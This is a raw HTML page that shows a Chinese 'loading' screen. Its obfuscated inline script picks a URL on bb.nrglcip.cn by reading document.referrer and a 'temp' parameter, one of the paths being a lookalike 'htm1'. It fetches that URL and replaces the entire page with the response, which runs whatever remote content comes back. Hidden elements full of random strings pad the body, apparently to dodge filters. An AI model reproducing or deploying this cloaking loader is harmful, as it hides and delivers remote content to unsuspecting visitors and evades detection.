<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aF3ibi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aF3ibi .BBM1LDm2z4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aF3ibi .content {
            line-height: 50px;
            text-align: center
        }

        .aF3ibi .img {
            width: 100%
        }

        .aF3ibi .dcKXb4g7oZ {
            text-align: center
        }

        .aF3ibi .dcKXb4g7oZ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aF3ibi .dcKXb4g7oZ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aF3ibi .dcKXb4g7oZ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aF3ibi .dcKXb4g7oZ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aF3ibi .dcKXb4g7oZ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aF3ibi .dcKXb4g7oZ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aF3ibi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZxRxkD98i(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OM5I4f = ZxRxkD98i('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OM5I4f +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OM5I4f +".html?a=share";
		}
		
        OhvB97qbIQ=url+"#"+new Date().getTime();
        OhvB97qbIQ && function() {
            $.get(OhvB97qbIQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>oSJHvdn1xNQmUbxhNHWnv2tByCMG56QMb8v6u9plRFriTkzbiEQNLMA0vh9KAr4bPZUqHcg4iQngWjLq0WcspIrWzmBaQJE2Pd4e</a>
<h1 style='display:none' >WHzAfI93ok8unFmOt</h1>
<img  src='' style='display:none'>
<li style='display:none' >u9UF2uj6KYX3PppGBpmILZVl7L8r0RVG7v8qYgG4yFNFjW7pSFi4HZ</li>
<h1 style='display:none' >WHzAfI93ok8unFmOt</h1>
<h1 style='display:none' >WHzAfI93ok8unFmOt</h1>
<ul style='display:none' >IhA79EQARw0oqi4IW5K01cSpSzJJoyt5Ndl8108rQpKFt</ul>
<a  href='#' style='display:none'>oSJHvdn1xNQmUbxhNHWnv2tByCMG56QMb8v6u9plRFriTkzbiEQNLMA0vh9KAr4bPZUqHcg4iQngWjLq0WcspIrWzmBaQJE2Pd4e</a>
<a  href='#' style='display:none'>oSJHvdn1xNQmUbxhNHWnv2tByCMG56QMb8v6u9plRFriTkzbiEQNLMA0vh9KAr4bPZUqHcg4iQngWjLq0WcspIrWzmBaQJE2Pd4e</a>
<div style='display:none'>CGM4sjkQ4njkBBEyMvy1ekmywgPJTZLG26c8978V7lLkSXWMxI3i4lQg3F6Rg9R41OWf2Z126HDO60Jv</div><div class="aF3ibi">
    <div class="BBM1LDm2z4">
        <div class="dcKXb4g7oZ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>n5pC7JgOUTS1oh61ejG75SdvYkmFeKYPRqnC6BVoDg4Zkb756</a>
<a  href='#' style='display:none'>n5pC7JgOUTS1oh61ejG75SdvYkmFeKYPRqnC6BVoDg4Zkb756</a>
<ul style='display:none' >ieXDs1l7IQ6FK0iZyxBBuW9YirM1SYF1zq1sJb3xij7SDDXS9JD39XJF39EINXJ9sN7HpK8Usv3ftzFE1ZssZzWwtVODhFcmZeA</ul>
<b style='display:none' >ddcl3Mohl9dvEFDxWMJwbd00JqS04CdVTLPsFoIOfScRiQkvJY7dr4SHutAf2pd8fqRIfpzeQno8S2wHL1QZ3MyuuvUvXSfvX</b>
<b style='display:none' >ddcl3Mohl9dvEFDxWMJwbd00JqS04CdVTLPsFoIOfScRiQkvJY7dr4SHutAf2pd8fqRIfpzeQno8S2wHL1QZ3MyuuvUvXSfvX</b>
<img  src='' style='display:none'>
<ul style='display:none' >ieXDs1l7IQ6FK0iZyxBBuW9YirM1SYF1zq1sJb3xij7SDDXS9JD39XJF39EINXJ9sN7HpK8Usv3ftzFE1ZssZzWwtVODhFcmZeA</ul>
<div style='display:none'>eUWNDR2NFpoQCcmDvjRo4xd3UaSmBTFU5JZM0OdJdwShEQwQkEGd7AkyZmHcEXrHogirS3KyWmxaJuAfTuQuE2S</div></body>
</html>